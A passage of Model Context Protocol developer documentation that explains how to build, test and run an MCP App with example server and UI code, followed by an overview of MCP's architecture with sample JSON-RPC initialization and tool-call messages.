Apps skill. If you prefer to set up a project manually, skip to
[Manual setup](#manual-setup).
### Using an AI coding agent
AI coding agents with Skills support can scaffold a complete MCP App project for
you. Skills are folders of instructions and resources that your agent loads when
relevant. They teach the AI how to perform specialized tasks like creating MCP
Apps.
The `create-mcp-app` skill includes architecture guidance, best practices, and
working examples that the agent uses to generate your project.
If you are using Claude Code, you can install the skill directly with:
```
/plugin marketplace add modelcontextprotocol/ext-apps
/plugin install mcp-apps@modelcontextprotocol-ext-apps
```
You can also use the [Vercel Skills CLI](https://skills.sh/) to install skills across different AI coding agents:
```bash theme={null}
npx skills add modelcontextprotocol/ext-apps
```
Alternatively, you can install the skill manually by cloning the ext-apps repository:
```bash theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps.git
```
And then copying the skill to the appropriate location for your agent:
| Agent | Skills directory (macOS/Linux) | Skills directory (Windows) |
| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------ | ------------------------------------- |
| [Claude Code](https://docs.anthropic.com/en/docs/claude-code/skills) | `~/.claude/skills/` | `%USERPROFILE%\.claude\skills\` |
| [VS Code](https://code.visualstudio.com/docs/copilot/customization/agent-skills) and [GitHub Copilot](https://docs.github.com/en/copilot/concepts/agents/about-agent-skills) | `~/.copilot/skills/` | `%USERPROFILE%\.copilot\skills\` |
| [Gemini CLI](https://geminicli.com/docs/cli/skills/) | `~/.gemini/skills/` | `%USERPROFILE%\.gemini\skills\` |
| [Cline](https://cline.bot/blog/cline-3-48-0-skills-and-websearch-make-cline-smarter) | `~/.cline/skills/` | `%USERPROFILE%\.cline\skills\` |
| [Goose](https://block.github.io/goose/docs/guides/context-engineering/using-skills/) | `~/.config/goose/skills/` | `%USERPROFILE%\.config\goose\skills\` |
| [Codex](https://developers.openai.com/codex/skills/) | `~/.codex/skills/` | `%USERPROFILE%\.codex\skills\` |
This list is not comprehensive. Other agents may support skills in different locations; check your agent's documentation.
For example, with Claude Code you can install the skill globally (available in all projects):
```bash macOS/Linux theme={null}
cp -r ext-apps/plugins/mcp-apps/skills/create-mcp-app ~/.claude/skills/create-mcp-app
```
```powershell Windows theme={null}
Copy-Item -Recurse ext-apps\plugins\mcp-apps\skills\create-mcp-app $env:USERPROFILE\.claude\skills\create-mcp-app
```
Or install it for a single project only by copying to `.claude/skills/` in your project directory:
```bash macOS/Linux theme={null}
mkdir -p .claude/skills && cp -r ext-apps/plugins/mcp-apps/skills/create-mcp-app .claude/skills/create-mcp-app
```
```powershell Windows theme={null}
New-Item -ItemType Directory -Force -Path .claude\skills | Out-Null; Copy-Item -Recurse ext-apps\plugins\mcp-apps\skills\create-mcp-app .claude\skills\create-mcp-app
```
To verify the skill is installed, ask your agent "What skills do you have access to?" — you should see `create-mcp-app` as one of the available skills.
Ask your AI coding agent to build it:
```
Create an MCP App that displays a color picker
```
The agent will recognize the `create-mcp-app` skill is relevant, load its instructions, then scaffold a complete project with server, UI, and configuration files.
```bash macOS/Linux theme={null}
npm install && npm run build && npm run serve
```
```powershell Windows theme={null}
npm install; npm run build; npm run serve
```
You might need to make sure that you are first in the **app folder** before running the commands above.
Follow the instructions in [Testing your app](#testing-your-app) below. For the color picker example, start a new chat and ask Claude to provide you a color picker.
### Manual setup
If you're not using an AI coding agent, or prefer to understand the setup
process, follow these steps.
A typical MCP App project separates the server code from the UI code:
The server registers the tool and serves the UI resource. The UI files get bundled into a single HTML file that the server returns when the host requests the resource.
```bash theme={null}
npm install @modelcontextprotocol/ext-apps @modelcontextprotocol/sdk
npm install -D typescript vite vite-plugin-singlefile express cors @types/express @types/cors tsx
```
The `ext-apps` package provides helpers for both the server side (registering tools and resources) and the client side (the `App` class for UI-to-host communication). Vite with the `vite-plugin-singlefile` plugin bundles your UI into a single HTML file that can be served as a resource.
The `"type": "module"` setting enables ES module syntax. The `build` script uses the `INPUT` environment variable to tell Vite which HTML file to bundle. The `serve` script runs your server using `tsx` for TypeScript execution.
```json theme={null}
{
"type": "module",
"scripts": {
"build": "INPUT=mcp-app.html vite build",
"serve": "npx tsx server.ts"
}
}
```
The TypeScript configuration targets modern JavaScript (`ES2022`) and uses ESNext modules with bundler resolution, which works well with Vite. The `include` array covers both the server code in the root and UI code in `src/`.
```json theme={null}
{
"compilerOptions": {
"target": "ES2022",
"module": "ESNext",
"moduleResolution": "bundler",
"strict": true,
"esModuleInterop": true,
"skipLibCheck": true,
"outDir": "dist"
},
"include": ["*.ts", "src/**/*.ts"]
}
```
```typescript theme={null}
import { defineConfig } from "vite";
import { viteSingleFile } from "vite-plugin-singlefile";
export default defineConfig({
plugins: [viteSingleFile()],
build: {
outDir: "dist",
rollupOptions: {
input: process.env.INPUT,
},
},
});
```
With the project structure and configuration in place, continue to [Building an MCP App](#building-an-mcp-app) below to implement the server and UI.
## Building an MCP App
Let's build a simple app that displays the current server time. This example
demonstrates the full pattern: registering a tool with UI metadata, serving the
bundled HTML as a resource, and building a UI that communicates with the server.
### Server implementation
The server needs to do two things: register a tool that includes the
`_meta.ui.resourceUri` field, and register a resource handler that serves the
bundled HTML. Here's the complete server file:
```typescript theme={null}
// server.ts
console.log("Starting MCP App server...");
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp.js";
import {
registerAppTool,
registerAppResource,
RESOURCE_MIME_TYPE,
} from "@modelcontextprotocol/ext-apps/server";
import cors from "cors";
import express from "express";
import fs from "node:fs/promises";
import path from "node:path";
const server = new McpServer({
name: "My MCP App Server",
version: "1.0.0",
});
// The ui:// scheme tells hosts this is an MCP App resource.
// The path structure is arbitrary; organize it however makes sense for your app.
const resourceUri = "ui://get-time/mcp-app.html";
// Register the tool that returns the current time
registerAppTool(
server,
"get-time",
{
title: "Get Time",
description: "Returns the current server time.",
inputSchema: {},
_meta: { ui: { resourceUri } },
},
async () => {
const time = new Date().toISOString();
return {
content: [{ type: "text", text: time }],
};
},
);
// Register the resource that serves the bundled HTML
registerAppResource(
server,
resourceUri,
resourceUri,
{ mimeType: RESOURCE_MIME_TYPE },
async () => {
const html = await fs.readFile(
path.join(import.meta.dirname, "dist", "mcp-app.html"),
"utf-8",
);
return {
contents: [
{ uri: resourceUri, mimeType: RESOURCE_MIME_TYPE, text: html },
],
};
},
);
// Expose the MCP server over HTTP
const expressApp = express();
expressApp.use(cors());
expressApp.use(express.json());
expressApp.post("/mcp", async (req, res) => {
const transport = new StreamableHTTPServerTransport({
sessionIdGenerator: undefined,
enableJsonResponse: true,
});
res.on("close", () => transport.close());
await server.connect(transport);
await transport.handleRequest(req, res, req.body);
});
expressApp.listen(3001, (err) => {
if (err) {
console.error("Error starting server:", err);
process.exit(1);
}
console.log("Server listening on http://localhost:3001/mcp");
});
```
Let's break down the key parts:
* **`resourceUri`**: The `ui://` scheme tells hosts this is an MCP App resource.
The path structure is arbitrary.
* **`registerAppTool`**: Registers a tool with the `_meta.ui.resourceUri` field.
When the host calls this tool, the UI is fetched and rendered, and the tool result is passed to it upon arrival.
* **`registerAppResource`**: Serves the bundled HTML when the host requests the UI resource.
* **Express server**: Exposes the MCP server over HTTP on port 3001.
### UI implementation
The UI consists of an HTML page and a TypeScript module that uses the `App`
class to communicate with the host. Here's the HTML:
```html theme={null}
Get Time App
Server Time:Loading...
```
And the TypeScript module:
```typescript theme={null}
// src/mcp-app.ts
import { App } from "@modelcontextprotocol/ext-apps";
const serverTimeEl = document.getElementById("server-time")!;
const getTimeBtn = document.getElementById("get-time-btn")!;
const app = new App({ name: "Get Time App", version: "1.0.0" });
// Establish communication with the host
app.connect();
// Handle the initial tool result pushed by the host
app.ontoolresult = (result) => {
const time = result.content?.find((c) => c.type === "text")?.text;
serverTimeEl.textContent = time ?? "[ERROR]";
};
// Proactively call tools when users interact with the UI
getTimeBtn.addEventListener("click", async () => {
const result = await app.callServerTool({
name: "get-time",
arguments: {},
});
const time = result.content?.find((c) => c.type === "text")?.text;
serverTimeEl.textContent = time ?? "[ERROR]";
});
```
The key parts:
* **`app.connect()`**: Establishes communication with the host. Call this once
when your app initializes.
* **`app.ontoolresult`**: A callback that fires when the host pushes a tool
result to your app (e.g., when the tool is first called and the UI renders).
* **`app.callServerTool()`**: Lets your app proactively call tools on the server.
Keep in mind that each call involves a round-trip to the server, so design your
UI to handle latency gracefully.
The `App` class provides additional methods for logging, opening URLs, and
updating the model's context with structured data from your app. See the full
[API documentation](https://modelcontextprotocol.github.io/ext-apps/api/).
## Testing your app
To test your MCP App, build the UI and start your local server:
```bash macOS/Linux theme={null}
npm run build && npm run serve
```
```powershell Windows theme={null}
npm run build; npm run serve
```
In the default configuration, your server will be available at
`http://localhost:3001/mcp`. However, to see your app render, you need an MCP
host that supports MCP Apps. You have several options.
### Testing with Claude
[Claude](https://claude.ai) (web) and [Claude Desktop](https://claude.ai/download)
support MCP Apps. For local development, you'll need to expose your server to
the internet. You can run an MCP server locally and use tools like `cloudflared`
to tunnel traffic through.
In a separate terminal, run:
```bash theme={null}
npx cloudflared tunnel --url http://localhost:3001
```
Copy the generated URL (e.g., `https://random-name.trycloudflare.com`) and add it
as a [custom connector](https://support.anthropic.com/en/articles/11175166-getting-started-with-custom-connectors-using-remote-mcp)
in Claude - click on your profile, go to **Settings**, **Connectors**, and
finally **Add custom connector**.
Custom connectors are available on paid Claude plans (Pro, Max, or Team).
### Testing with the basic-host
The `ext-apps` repository includes a test host for development. Clone the repo and
install dependencies:
```bash macOS/Linux theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps.git
cd ext-apps/examples/basic-host
npm install
```
```powershell Windows theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps.git
cd ext-apps\examples\basic-host
npm install
```
Running `npm start` from `ext-apps/examples/basic-host/` will start the basic-host
test interface. To connect it to a specific server (e.g., one you're developing),
pass the `SERVERS` environment variable inline:
```bash macOS/Linux theme={null}
SERVERS='["http://localhost:3001/mcp"]' npm start
```
```powershell Windows theme={null}
$env:SERVERS='["http://localhost:3001/mcp"]'; npm start
```
Navigate to `http://localhost:8080`. You'll see a simple interface where you can
select a tool and call it. When you call your tool, the host fetches the UI
resource and renders it in a sandboxed iframe. You can then interact with your
app and verify that tool calls work correctly.
## Security model
MCP Apps run in a sandboxed
[iframe](https://developer.mozilla.org/docs/Web/HTML/Element/iframe), which
provides strong isolation from the host application. The sandbox prevents your
app from accessing the parent window's
[DOM](https://developer.mozilla.org/docs/Web/API/Document_Object_Model), reading
the host's cookies or local storage, navigating the parent page, or executing
scripts in the parent context.
All communication between your app and the host goes through the
[postMessage API](https://developer.mozilla.org/docs/Web/API/Window/postMessage),
which the `App` class shown above abstracts for you. The host controls which
capabilities your app can access. For example, a host might restrict which tools
an app can call or disable the `sendOpenLink` capability.
The sandbox is designed to prevent apps from escaping to access the host or user data.
## Framework support
MCP Apps use their own dialect of MCP, built on JSON-RPC like the core protocol.
Some messages are shared with regular MCP (e.g., `tools/call`), while others are
specific to apps (e.g., `ui/initialize`). The transport is
[postMessage](https://developer.mozilla.org/docs/Web/API/Window/postMessage)
instead of stdio or HTTP. Since it's all standard web primitives, you can use any
framework or none at all.
The `App` class from `@modelcontextprotocol/ext-apps` is a convenience wrapper,
not a requirement. You can implement the
[postMessage protocol](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/draft/apps.mdx)
directly if you prefer to avoid dependencies or need tighter control.
The [examples directory](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples)
includes starter templates for React, Vue, Svelte, Preact, Solid, and vanilla
JavaScript. These demonstrate recommended patterns for each framework's system,
but they're examples rather than requirements. You can choose whatever works
best for your use case.
## Client support
MCP Apps is an extension to the [core MCP specification](/specification). Host support varies by client.
MCP Apps are currently supported by [Claude](https://claude.ai),
[Claude Desktop](https://claude.ai/download),
[Visual Studio Code (Insiders)](https://code.visualstudio.com/insiders), [Goose](https://block.github.io/goose/), [Postman](https://postman.com), and [MCPJam](https://www.mcpjam.com/). See the
[clients page](/clients) for the full list of MCP clients and their supported
features.
If you're building an MCP client and want to support MCP Apps, you have two options:
1. **Use a framework**: The [`@mcp-ui/client`](https://github.com/MCP-UI-Org/mcp-ui)
package provides React components for rendering and interacting with MCP Apps
views in your host application. See the
[MCP-UI documentation](https://mcpui.dev/) for usage details.
2. **Build on AppBridge**: The SDK includes an
[**App Bridge**](https://modelcontextprotocol.github.io/ext-apps/api/modules/app-bridge.html)
module that handles rendering apps in sandboxed iframes, message passing, tool
call proxying, and security policy enforcement. The
[basic-host example](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-host)
shows how to integrate it.
See the [API documentation](https://modelcontextprotocol.github.io/ext-apps/api/)
for implementation details.
## Examples
The [ext-apps repository](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples)
includes ready-to-run examples demonstrating different use cases:
* **3D and visualization**:
[map-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/map-server)
(CesiumJS globe),
[threejs-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/threejs-server)
(Three.js scenes),
[shadertoy-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/shadertoy-server)
(shader effects)
* **Data exploration**:
[cohort-heatmap-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/cohort-heatmap-server),
[customer-segmentation-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/customer-segmentation-server),
[wiki-explorer-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/wiki-explorer-server)
* **Business applications**:
[scenario-modeler-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/scenario-modeler-server),
[budget-allocator-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/budget-allocator-server)
* **Media**:
[pdf-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/pdf-server),
[video-resource-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/video-resource-server),
[sheet-music-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/sheet-music-server),
[say-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/say-server)
(text-to-speech)
* **Utilities**:
[qr-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/qr-server),
[system-monitor-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/system-monitor-server),
[transcript-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/transcript-server)
(speech-to-text)
* **Starter templates**:
[React](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-react),
[Vue](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-vue),
[Svelte](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-svelte),
[Preact](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-preact),
[Solid](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-solid),
[vanilla JavaScript](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-vanillajs)
To run any example:
```bash macOS/Linux theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps
cd ext-apps/examples/
npm install && npm start
```
```powershell Windows theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps
cd ext-apps\examples\
npm install; npm start
```
## Learn more
Full SDK reference and API details
Source code, examples, and issue tracker
Technical specification for implementers
## Feedback
MCP Apps is under active development. If you encounter issues or have ideas for
improvements, open an issue on the
[GitHub repository](https://github.com/modelcontextprotocol/ext-apps/issues).
For broader discussions about the extension's direction, join the conversation
in [GitHub Discussions](https://github.com/modelcontextprotocol/ext-apps/discussions).
# What is the Model Context Protocol (MCP)?
Source: https://modelcontextprotocol.io/docs/getting-started/intro
MCP (Model Context Protocol) is an open-source standard for connecting AI applications to external systems.
Using MCP, AI applications like Claude or ChatGPT can connect to data sources (e.g. local files, databases), tools (e.g. search engines, calculators) and workflows (e.g. specialized prompts)—enabling them to access key information and perform tasks.
Think of MCP like a USB-C port for AI applications. Just as USB-C provides a standardized way to connect electronic devices, MCP provides a standardized way to connect AI applications to external systems.
## What can MCP enable?
* Agents can access your Google Calendar and Notion, acting as a more personalized AI assistant.
* Claude Code can generate an entire web app using a Figma design.
* Enterprise chatbots can connect to multiple databases across an organization, empowering users to analyze data using chat.
* AI models can create 3D designs on Blender and print them out using a 3D printer.
## Why does MCP matter?
Depending on where you sit in the ecosystem, MCP can have a range of benefits.
* **Developers**: MCP reduces development time and complexity when building, or integrating with, an AI application or agent.
* **AI applications or agents**: MCP provides access to an ecosystem of data sources, tools and apps which will enhance capabilities and improve the end-user experience.
* **End-users**: MCP results in more capable AI applications or agents which can access your data and take actions on your behalf when necessary.
## Start Building
Create MCP servers to expose your data and tools
Develop applications that connect to MCP servers
## Learn more
Learn the core concepts and architecture of MCP
# Architecture overview
Source: https://modelcontextprotocol.io/docs/learn/architecture
This overview of the Model Context Protocol (MCP) discusses its [scope](#scope) and [core concepts](#concepts-of-mcp), and provides an [example](#example) demonstrating each core concept.
Because MCP SDKs abstract away many concerns, most developers will likely find the [data layer protocol](#data-layer-protocol) section to be the most useful. It discusses how MCP servers can provide context to an AI application.
For specific implementation details, please refer to the documentation for your [language-specific SDK](/docs/sdk).
## Scope
The Model Context Protocol includes the following projects:
* [MCP Specification](https://modelcontextprotocol.io/specification/latest): A specification of MCP that outlines the implementation requirements for clients and servers.
* [MCP SDKs](/docs/sdk): SDKs for different programming languages that implement MCP.
* **MCP Development Tools**: Tools for developing MCP servers and clients, including the [MCP Inspector](https://github.com/modelcontextprotocol/inspector)
* [MCP Reference Server Implementations](https://github.com/modelcontextprotocol/servers): Reference implementations of MCP servers.
MCP focuses solely on the protocol for context exchange—it does not dictate
how AI applications use LLMs or manage the provided context.
## Concepts of MCP
### Participants
MCP follows a client-server architecture where an MCP host — an AI application like [Claude Code](https://www.anthropic.com/claude-code) or [Claude Desktop](https://www.claude.ai/download) — establishes connections to one or more MCP servers. The MCP host accomplishes this by creating one MCP client for each MCP server. Each MCP client maintains a dedicated connection with its corresponding MCP server.
Local MCP servers that use the STDIO transport typically serve a single MCP client, whereas remote MCP servers that use the Streamable HTTP transport will typically serve many MCP clients.
The key participants in the MCP architecture are:
* **MCP Host**: The AI application that coordinates and manages one or multiple MCP clients
* **MCP Client**: A component that maintains a connection to an MCP server and obtains context from an MCP server for the MCP host to use
* **MCP Server**: A program that provides context to MCP clients
**For example**: Visual Studio Code acts as an MCP host. When Visual Studio Code establishes a connection to an MCP server, such as the [Sentry MCP server](https://docs.sentry.io/product/sentry-mcp/), the Visual Studio Code runtime instantiates an MCP client object that maintains the connection to the Sentry MCP server.
When Visual Studio Code subsequently connects to another MCP server, such as the [local filesystem server](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem), the Visual Studio Code runtime instantiates an additional MCP client object to maintain this connection.
```mermaid theme={null}
graph TB
subgraph "MCP Host (AI Application)"
Client1["MCP Client 1"]
Client2["MCP Client 2"]
Client3["MCP Client 3"]
Client4["MCP Client 4"]
end
ServerA["MCP Server A - Local (e.g. Filesystem)"]
ServerB["MCP Server B - Local (e.g. Database)"]
ServerC["MCP Server C - Remote (e.g. Sentry)"]
Client1 ---|"Dedicated connection"| ServerA
Client2 ---|"Dedicated connection"| ServerB
Client3 ---|"Dedicated connection"| ServerC
Client4 ---|"Dedicated connection"| ServerC
```
Note that **MCP server** refers to the program that serves context data, regardless of
where it runs. MCP servers can execute locally or remotely. For example, when
Claude Desktop launches the [filesystem
server](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem),
the server runs locally on the same machine because it uses the STDIO
transport. This is commonly referred to as a "local" MCP server. The official
[Sentry MCP server](https://docs.sentry.io/product/sentry-mcp/) runs on the
Sentry platform, and uses the Streamable HTTP transport. This is commonly
referred to as a "remote" MCP server.
### Layers
MCP consists of two layers:
* **Data layer**: Defines the JSON-RPC based protocol for client-server communication, including lifecycle management, and core primitives, such as tools, resources, prompts and notifications.
* **Transport layer**: Defines the communication mechanisms and channels that enable data exchange between clients and servers, including transport-specific connection establishment, message framing, and authorization.
Conceptually the data layer is the inner layer, while the transport layer is the outer layer.
#### Data layer
The data layer implements a [JSON-RPC 2.0](https://www.jsonrpc.org/) based exchange protocol that defines the message structure and semantics.
This layer includes:
* **Lifecycle management**: Handles connection initialization, capability negotiation, and connection termination between clients and servers
* **Server features**: Enables servers to provide core functionality including tools for AI actions, resources for context data, and prompts for interaction templates from and to the client
* **Client features**: Enables servers to ask the client to sample from the host LLM, elicit input from the user, and log messages to the client
* **Utility features**: Supports additional capabilities like notifications for real-time updates and progress tracking for long-running operations
#### Transport layer
The transport layer manages communication channels and authentication between clients and servers. It handles connection establishment, message framing, and secure communication between MCP participants.
MCP supports two transport mechanisms:
* **Stdio transport**: Uses standard input/output streams for direct process communication between local processes on the same machine, providing optimal performance with no network overhead.
* **Streamable HTTP transport**: Uses HTTP POST for client-to-server messages with optional Server-Sent Events for streaming capabilities. This transport enables remote server communication and supports standard HTTP authentication methods including bearer tokens, API keys, and custom headers. MCP recommends using OAuth to obtain authentication tokens.
The transport layer abstracts communication details from the protocol layer, enabling the same JSON-RPC 2.0 message format across all transport mechanisms.
### Data Layer Protocol
A core part of MCP is defining the schema and semantics between MCP clients and MCP servers. Developers will likely find the data layer — in particular, the set of [primitives](#primitives) — to be the most interesting part of MCP. It is the part of MCP that defines the ways developers can share context from MCP servers to MCP clients.
MCP uses [JSON-RPC 2.0](https://www.jsonrpc.org/) as its underlying RPC protocol. Client and servers send requests to each other and respond accordingly. Notifications can be used when no response is required.
#### Lifecycle management
MCP is a stateful protocol that requires lifecycle management. The purpose of lifecycle management is to negotiate the capabilities that both client and server support. Detailed information can be found in the [specification](/specification/latest/basic/lifecycle), and the [example](#example) showcases the initialization sequence.
#### Primitives
MCP primitives are the most important concept within MCP. They define what clients and servers can offer each other. These primitives specify the types of contextual information that can be shared with AI applications and the range of actions that can be performed.
MCP defines three core primitives that *servers* can expose:
* **Tools**: Executable functions that AI applications can invoke to perform actions (e.g., file operations, API calls, database queries)
* **Resources**: Data sources that provide contextual information to AI applications (e.g., file contents, database records, API responses)
* **Prompts**: Reusable templates that help structure interactions with language models (e.g., system prompts, few-shot examples)
Each primitive type has associated methods for discovery (`*/list`), retrieval (`*/get`), and in some cases, execution (`tools/call`).
MCP clients will use the `*/list` methods to discover available primitives. For example, a client can first list all available tools (`tools/list`) and then execute them. This design allows listings to be dynamic.
As a concrete example, consider an MCP server that provides context about a database. It can expose tools for querying the database, a resource that contains the schema of the database, and a prompt that includes few-shot examples for interacting with the tools.
For more details about server primitives see [server concepts](./server-concepts).
MCP also defines primitives that *clients* can expose. These primitives allow MCP server authors to build richer interactions.
* **Sampling**: Allows servers to request language model completions from the client's AI application. This is useful when server authors want access to a language model, but want to stay model-independent and not include a language model SDK in their MCP server. They can use the `sampling/complete` method to request a language model completion from the client's AI application.
* **Elicitation**: Allows servers to request additional information from users. This is useful when server authors want to get more information from the user, or ask for confirmation of an action. They can use the `elicitation/request` method to request additional information from the user.
* **Logging**: Enables servers to send log messages to clients for debugging and monitoring purposes.
For more details about client primitives see [client concepts](./client-concepts).
Besides server and client primitives, the protocol offers cross-cutting utility primitives that augment how requests are executed:
* **Tasks (Experimental)**: Durable execution wrappers that enable deferred result retrieval and status tracking for MCP requests (e.g., expensive computations, workflow automation, batch processing, multi-step operations)
#### Notifications
The protocol supports real-time notifications to enable dynamic updates between servers and clients. For example, when a server's available tools change—such as when new functionality becomes available or existing tools are modified—the server can send tool update notifications to inform connected clients about these changes. Notifications are sent as JSON-RPC 2.0 notification messages (without expecting a response) and enable MCP servers to provide real-time updates to connected clients.
## Example
### Data Layer
This section provides a step-by-step walkthrough of an MCP client-server interaction, focusing on the data layer protocol. We'll demonstrate the lifecycle sequence, tool operations, and notifications using JSON-RPC 2.0 messages.
MCP begins with lifecycle management through a capability negotiation handshake. As described in the [lifecycle management](#lifecycle-management) section, the client sends an `initialize` request to establish the connection and negotiate supported features.
```json Initialize Request theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2025-06-18",
"capabilities": {
"elicitation": {}
},
"clientInfo": {
"name": "example-client",
"version": "1.0.0"
}
}
}
```
```json Initialize Response theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"protocolVersion": "2025-06-18",
"capabilities": {
"tools": {
"listChanged": true
},
"resources": {}
},
"serverInfo": {
"name": "example-server",
"version": "1.0.0"
}
}
}
```
#### Understanding the Initialization Exchange
The initialization process is a key part of MCP's lifecycle management and serves several critical purposes:
1. **Protocol Version Negotiation**: The `protocolVersion` field (e.g., "2025-06-18") ensures both client and server are using compatible protocol versions. This prevents communication errors that could occur when different versions attempt to interact. If a mutually compatible version is not negotiated, the connection should be terminated.
2. **Capability Discovery**: The `capabilities` object allows each party to declare what features they support, including which [primitives](#primitives) they can handle (tools, resources, prompts) and whether they support features like [notifications](#notifications). This enables efficient communication by avoiding unsupported operations.
3. **Identity Exchange**: The `clientInfo` and `serverInfo` objects provide identification and versioning information for debugging and compatibility purposes.
In this example, the capability negotiation demonstrates how MCP primitives are declared:
**Client Capabilities**:
* `"elicitation": {}` - The client declares it can work with user interaction requests (can receive `elicitation/create` method calls)
**Server Capabilities**:
* `"tools": {"listChanged": true}` - The server supports the tools primitive AND can send `tools/list_changed` notifications when its tool list changes
* `"resources": {}` - The server also supports the resources primitive (can handle `resources/list` and `resources/read` methods)
After successful initialization, the client sends a notification to indicate it's ready:
```json Notification theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/initialized"
}
```
#### How This Works in AI Applications
During initialization, the AI application's MCP client manager establishes connections to configured servers and stores their capabilities for later use. The application uses this information to determine which servers can provide specific types of functionality (tools, resources, prompts) and whether they support real-time updates.
```python Pseudo-code for AI application initialization theme={null}
# Pseudo Code
async with stdio_client(server_config) as (read, write):
async with ClientSession(read, write) as session:
init_response = await session.initialize()
if init_response.capabilities.tools:
app.register_mcp_server(session, supports_tools=True)
app.set_server_ready(session)
```
Now that the connection is established, the client can discover available tools by sending a `tools/list` request. This request is fundamental to MCP's tool discovery mechanism — it allows clients to understand what tools are available on the server before attempting to use them.
```json Tools List Request theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/list"
}
```
```json Tools List Response theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"tools": [
{
"name": "calculator_arithmetic",
"title": "Calculator",
"description": "Perform mathematical calculations including basic arithmetic, trigonometric functions, and algebraic operations",
"inputSchema": {
"type": "object",
"properties": {
"expression": {
"type": "string",
"description": "Mathematical expression to evaluate (e.g., '2 + 3 * 4', 'sin(30)', 'sqrt(16)')"
}
},
"required": ["expression"]
}
},
{
"name": "weather_current",
"title": "Weather Information",
"description": "Get current weather information for any location worldwide",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "City name, address, or coordinates (latitude,longitude)"
},
"units": {
"type": "string",
"enum": ["metric", "imperial", "kelvin"],
"description": "Temperature units to use in response",
"default": "metric"
}
},
"required": ["location"]
}
}
]
}
}
```
#### Understanding the Tool Discovery Request
The `tools/list` request is simple, containing no parameters.
#### Understanding the Tool Discovery Response
The response contains a `tools` array that provides comprehensive metadata about each available tool. This array-based structure allows servers to expose multiple tools simultaneously while maintaining clear boundaries between different functionalities.
Each tool object in the response includes several key fields:
* **`name`**: A unique identifier for the tool within the server's namespace. This serves as the primary key for tool execution and should follow a clear naming pattern (e.g., `calculator_arithmetic` rather than just `calculate`)
* **`title`**: A human-readable display name for the tool that clients can show to users
* **`description`**: Detailed explanation of what the tool does and when to use it
* **`inputSchema`**: A JSON Schema that defines the expected input parameters, enabling type validation and providing clear documentation about required and optional parameters
#### How This Works in AI Applications
The AI application fetches available tools from all connected MCP servers and combines them into a unified tool registry that the language model can access. This allows the LLM to understand what actions it can perform and automatically generates the appropriate tool calls during conversations.
```python Pseudo-code for AI application tool discovery theme={null}
# Pseudo-code using MCP Python SDK patterns
available_tools = []
for session in app.mcp_server_sessions():
tools_response = await session.list_tools()
available_tools.extend(tools_response.tools)
conversation.register_available_tools(available_tools)
```
The client can now execute a tool using the `tools/call` method. This demonstrates how MCP primitives are used in practice: after discovering available tools, the client can invoke them with appropriate arguments.
#### Understanding the Tool Execution Request
The `tools/call` request follows a structured format that ensures type safety and clear communication between client and server. Note that we're using the proper tool name from the discovery response (`weather_current`) rather than a simplified name:
```json Tool Call Request theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "tools/call",
"params": {
"name": "weather_current",
"arguments": {
"location": "San Francisco",
"units": "imperial"
}
}
}
```
```json Tool Call Response theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in San Francisco: 68°F, partly cloudy with light winds from the west at 8 mph. Humidity: 65%"
}
]
}
}
```
#### Key Elements of Tool Execution
The request structure includes several important components:
1. **`name`**: Must match exactly the tool name from the discovery response (`weather_current`). This ensures the server can correctly identify which tool to execute.
2. **`arguments`**: Contains the input parameters as defined by the tool's `inputSchema`. In this example:
* `location`: "San Francisco" (required parameter)
* `units`: "imperial" (optional parameter, defaults to "metric" if not specified)
3. **JSON-RPC Structure**: Uses standard JSON-RPC 2.0 format with unique `id` for request-response correlation.
#### Understanding the Tool Execution Response
The response demonstrates MCP's flexible content system:
1. **`content` Array**: Tool responses return an array of content objects, allowing for rich, multi-format responses (text, images, resources, etc.)
2. **Content Types**: Each content object has a `type` field. In this example, `"type": "text"` indicates plain text content, but MCP supports various content types for different use cases.
3. **Structured Output**: The response provides actionable information that the AI application can use as context for language model interactions.
This execution pattern allows AI applications to dynamically invoke server functionality and receive structured responses that can be integrated into conversations with language models.
#### How This Works in AI Applications
